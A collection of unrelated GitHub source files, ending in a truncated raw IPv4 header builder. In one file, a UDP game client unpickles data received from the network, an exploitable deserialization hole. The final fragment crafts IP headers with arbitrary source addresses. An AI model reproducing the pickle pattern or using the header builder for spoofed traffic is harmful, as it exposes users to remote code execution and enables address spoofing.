@person\"))\n\nshow(p)\n\n\n","repo_name":"markumreed/data_science_for_everyone","sub_path":"bokeh_project/bokeh_graph_network_plots.py","file_name":"bokeh_graph_network_plots.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"2"} +{"seq_id":"22102320906","text":"from models.genes8bitarray import *\nfrom models.genes32bitarray import *\nfrom models.config import Config\nimport random\n\n\n\ndef check_set_and_get_code(genes):\n # Given a set of genes with random values\n values = []\n for code in genes.codeIndexRange():\n values.append(random.randint(0, 1))\n genes.buildEmpty()\n for code in genes.codeIndexRange():\n genes.setCode(code, values[code])\n\n # When the values in the genes are tested, they match the original values\n for code in genes.codeIndexRange():\n assert values[code] == genes.getCode(code)\n\ndef test_set_and_get_code():\n config = Config()\n check_set_and_get_code(GenesAs8BitArray(config))\n check_set_and_get_code(GenesAs32BitArray(config))\n\ndef check_genes_are_empty(genes):\n # Given a set of genes with zero values\n genes.buildEmpty()\n\n # When they are tested, they are all zero\n assert True == genes.areEmpty()\n\ndef test_new_genes_are_empty():\n config = Config()\n check_genes_are_empty(GenesAs8BitArray(config))\n check_genes_are_empty(GenesAs32BitArray(config))\n\ndef check_mutated_genes_are_not_all_zero(genes, config):\n # Given a set of genes with zero values that will likely mutate\n genes.buildEmpty()\n config.mutation_probability = config.mutation_probability * 10\n\n # When they are mutated\n genes.mutate()\n\n # Then the number mutated falls inside the range of mutation probability\n mutated_count = 0\n for code in genes.codeIndexRange():\n if (genes.getCode(code) == 1):\n mutated_count += 1\n assert mutated_count > 0\n assert mutated_count <= 2.0 * genes.number_of_codes * config.mutation_probability\n\ndef test_mutated_genes_are_not_all_zero():\n config = Config()\n check_mutated_genes_are_not_all_zero(GenesAs8BitArray(config), config)\n check_mutated_genes_are_not_all_zero(GenesAs32BitArray(config), config)\n\ndef check_mutation_can_be_disabled(genes, config):\n # Given a set of genes with zero values that will not mutate\n genes.buildEmpty()\n config.mutation_probability = 0\n\n # When they are 
mutated\n genes.mutate()\n\n # Then none have changed\n mutated_count = 0\n for code in genes.codeIndexRange():\n if (genes.getCode(code) == 1):\n mutated_count += 1\n assert mutated_count == 0\n\ndef test_mutation_can_be_disabled():\n config = Config()\n check_mutation_can_be_disabled(GenesAs8BitArray(config), config)\n check_mutation_can_be_disabled(GenesAs32BitArray(config), config)\n\ndef then_they_fall_into_the_float_range(config, genes):\n genes.buildFromRandom()\n\n fitness = genes.fitness(1)\n\n assert 0.0 <= fitness\n assert 1.0 >= fitness\n\ndef test_genes_as_float_using_default_range():\n # Given a set of genes with non zero values\n config = Config()\n\n then_they_fall_into_the_float_range(config, GenesAs8BitArray(config))\n then_they_fall_into_the_float_range(config, GenesAs32BitArray(config))\n\ndef test_genes__with_large_bit_coding_as_float():\n # Given a set of genes with non zero values\n config = Config()\n config.number_of_genes = 111\n config.size_of_each_gene = 111\n\n then_they_fall_into_the_float_range(config, GenesAs8BitArray(config))\n then_they_fall_into_the_float_range(config, GenesAs32BitArray(config))\n\ndef test_configurable_float_range():\n # Given a set of genes with non zero values and a different float range\n config = Config()\n config.float_lower = 1.5\n config.float_upper = 4.5\n\n then_they_fall_into_the_float_range(config, GenesAs8BitArray(config))\n then_they_fall_into_the_float_range(config, GenesAs32BitArray(config))\n\ndef are_genes_the_same(individual1, individual2):\n for code in individual1.codeIndexRange():\n if (individual1.getCode(code) != individual2.getCode(code)):\n return False\n return True\n\ndef create_father_different_to_mother(config, mother, genesBuilder):\n father = genesBuilder(config)\n father.buildFromRandom()\n while(are_genes_the_same(father, mother)):\n father.mutate()\n return father\n\ndef check_baby_is_not_identical_to_mother_or_father(genesBuilder):\n # Given a mother with some mutated genes, a father with some mutated genes and a baby\n config = Config()\n config.mutation_probability = config.mutation_probability * 10\n mother = genesBuilder(config)\n mother.buildFromRandom()\n father = create_father_different_to_mother(config, mother, genesBuilder)\n baby = genesBuilder(config)\n different_to_mother = False\n different_to_father = False\n\n # When the baby inherits from the mother and father\n baby.inheritFrom(mother, father)\n\n # Then the baby's genes are different to both\n for code in baby.codeIndexRange():\n if (baby.getCode(code) != father.getCode(code)):\n different_to_father = True\n if (baby.getCode(code) != mother.getCode(code)):\n different_to_mother = True\n assert different_to_father == True\n assert different_to_mother == True\n\ndef test_baby_is_not_identical_to_mother_or_father():\n check_baby_is_not_identical_to_mother_or_father(GenesAs8BitArray)\n check_baby_is_not_identical_to_mother_or_father(GenesAs32BitArray)\n\ndef check_baby_is_not_zero(genesBuilder):\n # Given a mother, a father and a baby\n # Given a mother with some mutated genes, a father with some mutated genes and a baby\n config = Config()\n config.mutation_probability = config.mutation_probability * 10\n mother = genesBuilder(config)\n mother.buildFromRandom()\n father = create_father_different_to_mother(config, mother, genesBuilder)\n baby = genesBuilder(config)\n non_zero = False\n\n # When the baby inherits from the mother and father\n baby.inheritFrom(mother, father)\n\n # Then the baby's genes are non zero\n for code in 
baby.codeIndexRange():\n if (baby.getCode(code) != 0):\n non_zero = True\n assert non_zero == True\n\ndef test_baby_is_not_zero():\n check_baby_is_not_zero(GenesAs8BitArray)\n check_baby_is_not_zero(GenesAs32BitArray)\n\ndef check_baby_is_similar_to_mother_and_father(genesBuilder):\n # Given a mother with some mutated genes, a father with some mutated genes and a baby\n config = Config()\n config.mutation_probability = config.mutation_probability * 10\n genesBuilder = genesBuilder\n mother = genesBuilder(config)\n mother.buildFromRandom()\n father = create_father_different_to_mother(config, mother, genesBuilder)\n baby = genesBuilder(config)\n similar_to_mother = False\n similar_to_father = False\n\n # When the baby inherits from the mother and father\n baby.inheritFrom(mother, father)\n\n # Then the baby's genes has some similarity to both\n for code in baby.codeIndexRange():\n if (baby.getCode(code) == father.getCode(code)):\n similar_to_father = True\n if (baby.getCode(code) == mother.getCode(code)):\n similar_to_mother = True\n assert similar_to_mother == True\n assert similar_to_father == True\n\ndef test_baby_is_similar_to_mother_and_father():\n check_baby_is_similar_to_mother_and_father(GenesAs8BitArray)\n check_baby_is_similar_to_mother_and_father(GenesAs32BitArray)\n","repo_name":"petecallaghan/PopulationFitness","sub_path":"Python/test/test_genes.py","file_name":"test_genes.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35852804486","text":"import argparse\nimport os\nimport re\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"filenames\", help=\"list of files to check, all files if unspecified\", nargs='*')\nargs = parser.parse_args()\n\n# Cargo culted from http://stackoverflow.com/questions/898669/how-can-i-detect-if-a-file-is-binary-non-text-in-python\ndef is_binary(pathname):\n \"\"\"Return true if the given filename is binary.\n @raise EnvironmentError: if the file does not exist or cannot be accessed.\n @attention: found @ http://bytes.com/topic/python/answers/21222-determine-file-type-binary-text on 6/08/2010\n @author: Trent Mick \n @author: Jorge Orpinel \"\"\"\n try:\n with open(pathname, 'r') as f:\n CHUNKSIZE = 1024\n while True:\n chunk = f.read(CHUNKSIZE)\n if '\\0' in chunk: # found null byte\n return True\n if len(chunk) < CHUNKSIZE:\n break # done\n except:\n return True\n\n return False\n\ndef get_all_files(rootdir):\n all_files = []\n for root, dirs, files in os.walk(rootdir):\n # don't visit certain dirs\n if 'vendor' in dirs:\n dirs.remove('vendor')\n if 'staging' in dirs:\n dirs.remove('staging')\n if '_output' in dirs:\n dirs.remove('_output')\n if '_gopath' in dirs:\n dirs.remove('_gopath')\n if 'third_party' in dirs:\n dirs.remove('third_party')\n if '.git' in dirs:\n dirs.remove('.git')\n\n for name in files:\n pathname = os.path.join(root, name)\n if not is_binary(pathname):\n all_files.append(pathname)\n return all_files\n\n# Collects all the flags used in golang files and verifies the flags do\n# not contain underscore. 
If any flag needs to be excluded from this check,\n# need to add that flag in hack/verify-flags/excluded-flags.txt.\ndef check_underscore_in_flags(rootdir, files):\n # preload the 'known' flags which don't follow the - standard\n pathname = os.path.join(rootdir, \"hack/verify-flags/excluded-flags.txt\")\n f = open(pathname, 'r')\n excluded_flags = set(f.read().splitlines())\n f.close()\n\n regexs = [ re.compile('Var[P]?\\([^,]*, \"([^\"]*)\"'),\n re.compile('.String[P]?\\(\"([^\"]*)\",[^,]+,[^)]+\\)'),\n re.compile('.Int[P]?\\(\"([^\"]*)\",[^,]+,[^)]+\\)'),\n re.compile('.Bool[P]?\\(\"([^\"]*)\",[^,]+,[^)]+\\)'),\n re.compile('.Duration[P]?\\(\"([^\"]*)\",[^,]+,[^)]+\\)'),\n re.compile('.StringSlice[P]?\\(\"([^\"]*)\",[^,]+,[^)]+\\)') ]\n\n new_excluded_flags = set()\n # walk all the files looking for any flags being declared\n for pathname in files:\n if not pathname.endswith(\".go\"):\n continue\n f = open(pathname, 'r')\n data = f.read()\n f.close()\n matches = []\n for regex in regexs:\n matches = matches + regex.findall(data)\n for flag in matches:\n if any(x in flag for x in excluded_flags):\n continue\n if \"_\" in flag:\n new_excluded_flags.add(flag)\n if len(new_excluded_flags) != 0:\n print(\"Found a flag declared with an _ but which is not explicitly listed as a valid flag name in hack/verify-flags/excluded-flags.txt\")\n print(\"Are you certain this flag should not have been declared with an - instead?\")\n l = list(new_excluded_flags)\n l.sort()\n print((\"%s\" % \"\\n\".join(l)))\n sys.exit(1)\n\ndef main():\n rootdir = os.path.dirname(__file__) + \"/../\"\n rootdir = os.path.abspath(rootdir)\n\n if len(args.filenames) > 0:\n files = args.filenames\n else:\n files = get_all_files(rootdir)\n\n check_underscore_in_flags(rootdir, files)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"kubernetes/kubernetes","sub_path":"hack/verify-flags-underscore.py","file_name":"verify-flags-underscore.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":103227,"dataset":"github-code","pt":"2"} +{"seq_id":"13889382378","text":"import asyncio\n\nfrom services import get_random_countdown, get_random_delay\n\n\nasync def launch_rocket(name: int, countdown: int, delay: float) -> None:\n print(f\"Launching rocket #{name}\")\n for i in reversed(range(1, countdown)):\n print(f\"{i}...\")\n await asyncio.sleep(1)\n\n print(f\"Delay for {delay}\")\n await asyncio.sleep(delay)\n\n print(\"Rocket in the space\")\n\n\ndef main():\n N = 10_000\n tasks = [\n launch_rocket(\n i,\n get_random_countdown(),\n get_random_delay(),\n )\n for i in range(1, N + 1)\n ]\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(asyncio.gather(*tasks))\n loop.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DenysShevchenko/Hillel_05_2022_Work","sub_path":"lesson_11_async_threads/classwork/async.py","file_name":"async.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"28431035487","text":"'''\ndef tarolo():\n sor = [\"0 0 0\"]\n kocka = [sor, sor , sor]\n for elem in kocka:\n print(elem)\n\n\ntarolo()\n'''\ndef tarolo():\n sor = int(input(\"sor\"))\n oszlop = int(input(\"oszlop\"))\n tarolof = []\n sorszam = 0\n oszlopszam = 0\n\n for o in range(3):\n egy_sor = []\n sorszam = sorszam + 1\n oszlopszam = 0\n for z in range(3):\n oszlopszam = oszlopszam + 1\n if sor == sorszam and oszlop == oszlopszam:\n egy_sor.append(\"+\")\n 
else:\n egy_sor.append(\"0\")\n tarolof.append(egy_sor)\n for t in tarolof:\n print(t)\ntarolo()\n\n","repo_name":"kizsi2019/22_10D2","sub_path":"Uivárosi Gábriel/adatipus2.py","file_name":"adatipus2.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"hu","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"40274710058","text":"\"\"\"Main module.\"\"\"\nimport logging\nfrom typing import Optional\nfrom urllib.parse import urlencode\n\nimport requests\n\nfrom .exceptions import QuerySentinelProductsError\nfrom .query_sentinel_products_response import QuerySentinelProductsResponse\nfrom .request.model import SentinelProductRequest\n\n__SENTINEL_HUB_URL_PATTERN = \"https://scihub.copernicus.eu/dhus/search?{query}\"\n\n\ndef query_sentinel_hub(\n sentinel_product_request: SentinelProductRequest,\n *,\n log_level: int = logging.INFO,\n logger: Optional[logging.Logger] = None,\n) -> QuerySentinelProductsResponse:\n \"\"\"Queries the Sentinel Hub for the information in the request.\n\n Args:\n sentinel_product_request::SentinelProductRequest\n Details regarding the request\n\n log_level::int\n Level of logs to print\n\n logger::Optional[logging.Logger]\n Logger to log information and error message defaults to None\n\n Returns:\n result::QuerySentinelProductsResponse\n Result of the query\n \"\"\"\n if logger is None:\n logger = logging.getLogger(__name__)\n logger.setLevel(log_level)\n try:\n response = __call_api(sentinel_product_request, logger)\n logger.info(\n f\"Received response from Sentinel hub with status: {response.status_code}\"\n )\n return __read_response(response)\n except IOError as request_exception:\n return QuerySentinelProductsResponse(None, None, request_exception)\n\n\ndef __call_api(\n sentinel_product_request: SentinelProductRequest, logger: logging.Logger\n) -> requests.Response:\n logger.debug(f\"Querying sentinel hub with request: {sentinel_product_request}\")\n url = __build_url(sentinel_product_request)\n auth = (sentinel_product_request.username, sentinel_product_request.password)\n logger.debug(f\"Constructed url: {url}\")\n return requests.get(url, auth=auth,)\n\n\ndef __read_response(response: requests.Response) -> QuerySentinelProductsResponse:\n try:\n data = response.json()\n return QuerySentinelProductsResponse(response.status_code, data)\n except ValueError as json_error:\n return QuerySentinelProductsResponse(\n response.status_code,\n None,\n QuerySentinelProductsError(\n json_error, response.status_code, response.content.decode()\n ),\n )\n\n\ndef __build_url(sentinel_product_request: SentinelProductRequest) -> str:\n query_params = {\n \"q\": sentinel_product_request.query,\n \"start\": sentinel_product_request.start,\n \"format\": \"json\",\n }\n\n if sentinel_product_request.rows is not None:\n query_params[\"rows\"] = sentinel_product_request.rows\n\n if sentinel_product_request.order_by is not None:\n query_params[\"orderby\"] = sentinel_product_request.order_by\n\n return __SENTINEL_HUB_URL_PATTERN.format(query=urlencode(query_params))\n","repo_name":"UKHO/sentinelpy","sub_path":"sentinelpy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"18249455431","text":"import sys\nimport socket\nimport select\nfrom pickle import dumps, loads\nfrom zlib import compress, decompress\n\nclass Client(object):\n\t\"\"\" The client class for multiplayer games.\n\tOverride the update() method 
for updating events, rendering, etc.\n\t\"\"\"\n\tdef __init__(self, localaddr=(socket.gethostbyname(socket.gethostname()), 8540), myport=0, buffersize=4096, protocol=0):\n\t\tself.server = localaddr\n\t\tself.client = [socket.gethostbyname(socket.gethostname()), myport]\n\t\tself.buffer = buffersize\n\t\tself.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.protocol = protocol\n\t\t\n\t\tself.readlist = []\n\t\tself.writelist = []\n\n\t\tself.queue = []\n\n\t\tself.socket.bind(tuple(self.client))\n\t\tself.readlist.append(self.socket)\n\t\tself.connect()\n\n\tdef connect(self):\n\t\tself.send({'action' : 'connect'})\n\n\tdef pump(self):\n\t\t\"\"\" Handles all the networking stuff.\n\t\tAlways call this in the gameloop.\n\t\t\"\"\"\n\t\tr, w, e = select.select(self.readlist, self.writelist, [], 0)\n\t\tfor f in r:\n\t\t\tif f is self.socket:\n\t\t\t\tmsg = f.recv(self.buffer)\n\t\t\t\tself.queue.append(dict(loads(decompress(msg))))\n\n\t\t# Drain the queue instead of calling remove() while iterating over it,\n\t\t# which would skip every other queued message.\n\t\twhile self.queue:\n\t\t\tdata = self.queue.pop(0)\n\t\t\t[getattr(self, n)(data) for n in ('network_' + data['action'], 'network') if hasattr(self, n)]\n\n\tdef update(self, *args):\n\t\t\"\"\" Handle non-networking updates.\n\t\tThe following statement,\n\n\t\tself.send({'action' : 'update'})\n\n\t\tmust always be called by the function\n\t\teven when overridden.\n\t\t\"\"\"\n\t\tself.send({'action' : 'update'})\n\n\tdef send(self, data, debug=False):\n\t\t\"\"\" Send data to the server.\n\t\t\"\"\"\n\t\tdata.update({'client' : self.socket.getsockname(), 'protocol' : self.protocol})\n\t\tz = zip(data.keys(), data.values())\n\t\td = compress(dumps(z))\n\t\tif debug:\n\t\t\tprint(sys.getsizeof(d))\n\t\t\t\n\t\tself.socket.sendto(d, self.server)\n\n\tdef close(self):\n\t\t\"\"\" Call this when the user wants\n\t\tto disconnect from the server.\n\t\t\"\"\"\n\t\tself.send({'action' : 'disconnect'})\n\t\tself.socket.close()\n\n\tdef network_serverClose(self, data):\n\t\tself.close()\n\n\nif __name__ == '__main__':\n\tclass TestClient(Client):\n\t\tdef __init__(self):\n\t\t\tClient.__init__(self)\n\n\t\tdef network_imfat(self, data):\n\t\t\tprint(data['msg'])\n\n\n\tc = TestClient()\n\twhile True:\n\t\tc.pump()\n\t\tc.update()","repo_name":"SirBob01/Centurion-Human-Evolution","sub_path":"data/sys/pie/net/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} {"seq_id":"8597111260","text":"import re\n\nclass Solution:\n    def isNumber(self, s: str) -> bool:\n        # this works, but it would be nice to be able to solve this in only 1 loop. 
My solution iterates it several times\n # an example of 1 loop using DFA: https://leetcode.com/problems/valid-number/discuss/23728/A-simple-solution-in-Python-based-on-DFA\n # a clever example of 1 loop by using booleans for states (without a DFA): https://leetcode.com/problems/valid-number/discuss/173977/Python-with-simple-explanation\n espies = re.split(\"[eE]\", s)\n # print(\"espies\", s, espies)\n if len(espies) > 2: return False\n elif len(espies) == 2:\n # print(\"espies\", isDecimal(espies[0]), isSignedInteger(espies[1]))\n return isDecimal(espies[0]) and isSignedInteger(espies[1])\n return isDecimal(s)\n\ndigits = \"0123456789\"\nsigns = \"-+\"\ndigitsigns = digits + signs\ndef isInteger(s): return s != \"\" and all(l in digits for l in s)\ndef isSignedInteger(s):\n return len(s) > 0 and s[0] in signs and isInteger(s[1:]) or isInteger(s)\n\ndef isDecimal(s):\n if not s: return False\n\n digitcount = 0\n decimalcount = 0\n for i, l in enumerate(s):\n if l in signs:\n if i != 0 or i == len(s) - 1: return False\n elif l == \".\":\n if i == 0 and i == len(s) - 1: return False\n decimalcount += 1\n elif l not in digits: return False\n else:\n digitcount += 1\n return decimalcount <= 1 and digitcount > 0\n\n# def isIntegerE(s):\n# if not s: return False\n# ecount = 0\n# for i, l in enumerate(s):\n# if l in signs:\n# if i != 0 or i == len(s) - 1: return False\n# elif l in \"eE\":\n# if i == 0 or i == len(s) - 1: return False\n# ecount += 1\n# elif l not in digits: return False\n# return ecount <= 1\n\ns = Solution()\n\nfor value in [\"2\", \"0089\", \"-0.1\", \"+3.14\", \"4.\", \"-.9\", \"2e10\", \"-90E3\", \"3e+7\", \"+6e-1\", \"53.5e93\", \"-123.456e789\"]:\n assert s.isNumber(value) == True\n\nfor value in [\"\", \"abc\", \"1a\", \"1e\", \"e3\", \"99e2.5\", \"--6\", \"-+3\", \"95a54e53\", \".\", \"4e+\", \"+.\"]:\n assert s.isNumber(value) == False","repo_name":"shurane/problems","sub_path":"leetcode-clackamas/valid-number.py","file_name":"valid-number.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24199813263","text":"import logging\n\nloggers ={}\n\ndef getLogger(name):\n global loggers\n\n if loggers.get(name):\n return loggers.get(name)\n else:\n logger = logging.getLogger(name)\n if not logger.handlers:\n handler = logging.StreamHandler()\n formatter = logging.Formatter('%(asctime)s [%(name)-12s] %(levelname)-8s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n logger.propagate = False\n loggers[name] = logger\n return logger","repo_name":"Birkenpapier/informaticup21","sub_path":"miscellaneous/infomaterial/create_state/pylogging.py","file_name":"pylogging.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23503738279","text":"\"\"\"\nUtility module providing some convenient functions.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nimport platform\nimport shlex\nfrom dataclasses import dataclass\nfrom logging import getLogger\nfrom typing import IO, Iterable, List, Optional, Union, cast\n\nlogger = getLogger(__name__)\n\nFileLikeObj = Union[IO, str, os.PathLike]\n\n\ndef java_version() -> str:\n \"\"\"Show Java version\n\n Returns:\n str: Result of ``java -version``\n \"\"\"\n import subprocess\n\n try:\n res = subprocess.check_output(\n [\"java\", \"-version\"], stderr=subprocess.STDOUT\n 
).decode()\n\n    except FileNotFoundError:\n        res = (\n            \"`java -version` failed. `java` command is not found from this Python \"\n            \"process. Please ensure Java is installed and PATH is set for `java`\"\n        )\n\n    return res\n\n\ndef environment_info() -> None:\n    \"\"\"Show environment information for reporting.\n\n    Returns:\n        str:\n            Detailed information like Python version, Java version,\n            or OS environment, etc.\n    \"\"\"\n\n    import sys\n\n    import distro\n\n    from tabula import __version__\n\n    print(\n        f\"\"\"Python version:\n    {sys.version}\nJava version:\n    {java_version().strip()}\ntabula-py version: {__version__}\nplatform: {platform.platform()}\nuname:\n    {str(platform.uname())}\nlinux_distribution: ('{distro.name()}', '{distro.version()}', '{distro.codename()}')\nmac_ver: {platform.mac_ver()}\"\"\"\n    )\n\n\n@dataclass\nclass TabulaOption:\n    \"\"\"Build options for tabula-java\n\n    Args:\n        pages (str, int, `iterable` of `int`, optional):\n            An optional value specifying pages to extract from. It allows\n            `str`,`int`, `iterable` of :`int`. Default: `1`\n\n            Examples:\n                ``'1-2,3'``, ``'all'``, ``[1,2]``\n        guess (bool, optional):\n            Guess the portion of the page to analyze per page. Default `True`\n            If you use \"area\" option, this option becomes `False`.\n\n            Note:\n                As of tabula-java 1.0.3, guess option becomes independent from\n                lattice and stream option, you can use guess and lattice/stream option\n                at the same time.\n\n        area (iterable of float, iterable of iterable of float, optional):\n            Portion of the page to analyze(top,left,bottom,right).\n            Default is entire page.\n\n            Note:\n                If you want to use multiple area options and extract in one table, it\n                should be better to set ``multiple_tables=False`` for :func:`read_pdf()`\n\n            Examples:\n                ``[269.875,12.75,790.5,561]``,\n                ``[[12.1,20.5,30.1,50.2], [1.0,3.2,10.5,40.2]]``\n\n        relative_area (bool, optional):\n            If all area values are between 0-100 (inclusive) and preceded by ``'%'``,\n            input will be taken as % of actual height or width of the page.\n            Default ``False``.\n        lattice (bool, optional):\n            Force PDF to be extracted using lattice-mode extraction\n            (if there are ruling lines separating each cell, as in a PDF of an\n            Excel spreadsheet)\n        stream (bool, optional):\n            Force PDF to be extracted using stream-mode extraction\n            (if there are no ruling lines separating each cell, as in a PDF of an\n            Excel spreadsheet)\n        password (str, optional):\n            Password to decrypt document. Default: empty\n        silent (bool, optional):\n            Suppress all stderr output.\n        columns (iterable, optional):\n            X coordinates of column boundaries.\n\n            Example:\n                ``[10.1, 20.2, 30.3]``\n        relative_columns (bool, optional):\n            If all values are between 0-100 (inclusive) and preceded by '%',\n            input will be taken as % of actual width of the page.\n            Default ``False``.\n        format (str, optional):\n            Format for output file or extracted object.\n            (``\"CSV\"``, ``\"TSV\"``, ``\"JSON\"``)\n        batch (str, optional):\n            Convert all PDF files in the provided directory. This argument should be\n            directory path.\n        output_path (str, optional):\n            Output file path. File format of it depends on ``format``.\n            Same as ``--outfile`` option of tabula-java.\n        options (str, optional):\n            Raw option string for tabula-java.\n        multiple_tables (bool, optional):\n            Extract multiple tables into a dataframe. Default: True
\n    \"\"\"\n\n    pages: Optional[Union[str, int, Iterable[int]]] = None\n    guess: bool = True\n    area: Optional[Union[Iterable[float], Iterable[Iterable[float]]]] = None\n    relative_area: bool = False\n    lattice: bool = False\n    stream: bool = False\n    password: Optional[str] = None\n    silent: Optional[bool] = None\n    columns: Optional[Iterable[float]] = None\n    relative_columns: bool = False\n    format: Optional[str] = None\n    batch: Optional[str] = None\n    output_path: Optional[str] = None\n    options: Optional[str] = \"\"\n    multiple_tables: bool = True\n\n    def merge(self, other: TabulaOption) -> TabulaOption:\n        \"\"\"Merge two TabulaOption.\n        self will overwrite other fields' values.\n        \"\"\"\n        return TabulaOption(\n            pages=self.pages or other.pages,\n            guess=self.guess or other.guess,\n            area=self.area or other.area,\n            relative_area=self.relative_area or other.relative_area,\n            lattice=self.lattice or other.lattice,\n            stream=self.stream or other.stream,\n            password=self.password or other.password,\n            silent=self.silent or other.silent,\n            columns=self.columns or other.columns,\n            relative_columns=self.relative_columns or other.relative_columns,\n            format=self.format or other.format,\n            batch=self.batch or other.batch,\n            output_path=self.output_path or other.output_path,\n            options=self.options or other.options,\n            multiple_tables=self.multiple_tables or other.multiple_tables,\n        )\n\n    def build_option_list(self) -> List[str]:\n        \"\"\"Convert to tabula-java option list\"\"\"\n        __options = []\n        # handle options described in string for backward compatibility\n        if self.options:\n            __options += shlex.split(self.options)\n\n        if self.pages:\n            __pages = self.pages\n            if isinstance(self.pages, int):\n                __pages = str(self.pages)\n            elif type(self.pages) in [list, tuple]:\n                __pages = \",\".join(map(str, self.pages))\n\n            __pages = cast(str, __pages)\n            __options += [\"--pages\", __pages]\n        else:\n            logger.warning(\n                \"'pages' argument isn't specified. \"\n                \"Will extract only from page 1 by default.\"\n            )\n\n        multiple_areas = False\n\n        if self.area:\n            self.guess = False\n            if type(self.area) in [list, tuple]:\n                # Check if nested list or tuple for multiple areas\n                if any(type(e) in [list, tuple] for e in self.area):\n                    for e in self.area:\n                        e = cast(Iterable[float], e)\n                        _validate_area(e)\n                        __area = _format_with_relative(e, self.relative_area)\n                        __options += [\"--area\", __area]\n                    multiple_areas = True\n\n                else:\n                    area = cast(Iterable[float], self.area)\n                    _validate_area(area)\n                    __area = _format_with_relative(area, self.relative_area)\n                    __options += [\"--area\", __area]\n\n        if self.lattice:\n            __options.append(\"--lattice\")\n\n        if self.stream:\n            __options.append(\"--stream\")\n\n        if self.guess and not multiple_areas:\n            __options.append(\"--guess\")\n\n        if self.format:\n            __options += [\"--format\", self.format]\n\n        if self.output_path:\n            __options += [\"--outfile\", self.output_path]\n\n        if self.columns:\n            if self.columns != sorted(self.columns):\n                raise ValueError(\"columns option should be sorted\")\n\n            __columns = _format_with_relative(self.columns, self.relative_columns)\n            __options += [\"--columns\", __columns]\n\n        if self.password:\n            __options += [\"--password\", self.password]\n\n        if self.batch:\n            __options += [\"--batch\", self.batch]\n\n        if self.silent:\n            __options.append(\"--silent\")\n\n        return __options\n\n\ndef _format_with_relative(values: Iterable[float], is_relative: bool) -> str:\n    percent = \"%\" if is_relative else \"\"\n    value_str = \",\".join(map(str, values))\n\n    return f\"{percent}{value_str}\"
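\n\n# Illustrative usage (a sketch, not part of tabula-py itself): with the\n# defaults above,\n#   TabulaOption(pages=\"1-2\", lattice=True, format=\"JSON\").build_option_list()\n# is expected to yield\n#   [\"--pages\", \"1-2\", \"--lattice\", \"--guess\", \"--format\", \"JSON\"]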
\n\n\ndef _validate_area(values: Iterable[float]) -> None:\n    value_length = len(list(values))\n    if value_length != 4:\n        raise ValueError(\n            f\"area should have 4 values for each option but {values} has {value_length}\"\n        )\n    top, left, bottom, right = values\n    if top >= bottom:\n        raise ValueError(\n            f\"area option bottom={bottom} should be greater than top={top}\"\n        )\n    if left >= right:\n        raise ValueError(\n            f\"area option right={right} should be greater than left={left}\"\n        )\n","repo_name":"chezou/tabula-py","sub_path":"tabula/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":9383,"program_lang":"python","lang":"en","doc_type":"code","stars":1955,"dataset":"github-code","pt":"2"} {"seq_id":"23787452575","text":"#!/usr/bin/env python3\nimport socket\nimport struct\nimport time\n\nclass the_oipv4_header:\n    def __init__(self, src_address, dst_address):\n        self.src_address = src_address\n        self.dst_address = dst_address\n        self.new_ipv4_header = None\n\n    def create_oipv4_packet(self):\n        ip_ver = 4 \n        ip_ihl = 5 \n        self.ip_ver = (ip_ver << 4) + ip_ihl \n\n        ip_dsc = 0\n        ip_enc = 0\n        self.ip_tos = (ip_dsc << 2) + ip_enc \n\n        self.ip_tolen = 0 \n\n        self.ip_id = 54321 \n\n        ip_default = 0 \n        ip_dontfrag = 0 \n        ip_morefrag = 0 \n        ip_fragoff = 0 \n        self.ip_flg = (ip_default << 7) + (ip_dontfrag << 6) + (ip_morefrag << 5) + (ip_fragoff) \n\n        self.ip_ttl = 255 \n\n        self.ip_proto = 51 \t\t#6 = tcp, 17 = udp, 41 = ipv6, 50 = ipsec esp, 51 = ipsec ah\n\n        self.ip_chksm = 0 \n\n        self.ip_src = socket.inet_aton(self.src_address) \n        self.ip_dst = socket.inet_aton(self.dst_address) \n\n\n        self.new_ipv4_header = struct.pack('!BBHHHBBH4s4s', \n            self.ip_ver, self.ip_tos, self.ip_tolen, self.ip_id, self.ip_flg, self.ip_ttl, \\\n            self.ip_proto, self.ip_chksm, self.ip_src, self.ip_dst) \n\n        return self.new_ipv4_header\n\nclass the_iipv4_header:\n    def __init__(self, src_address, dst_address):\n        self.src_address = src_address\n        self.dst_address = dst_address\n        self.new_ipv4_header = None\n\n    def create_iipv4_packet(self):\n        ip_ver = 4 \n        ip_ihl = 5 \n        self.ip_ver = (ip_ver << 4) + ip_ihl \n\n        ip_dsc = 0\n        ip_enc = 0\n        self.ip_tos = (ip_dsc << 2) + ip_enc \n\n        self.ip_tolen = 0 \n\n        self.ip_id = 54321 \n\n        ip_default = 0 \n        ip_dontfrag = 0 \n        ip_morefrag = 0 \n        ip_fragoff = 0 \n        self.ip_flg = (ip_default << 7) + (ip_dontfrag << 6) + (ip_morefrag << 5) + (ip_fragoff) \n\n        self.ip_ttl = 255 \n\n        self.ip_proto = 1 \t#1 = icmp, 6 = tcp, 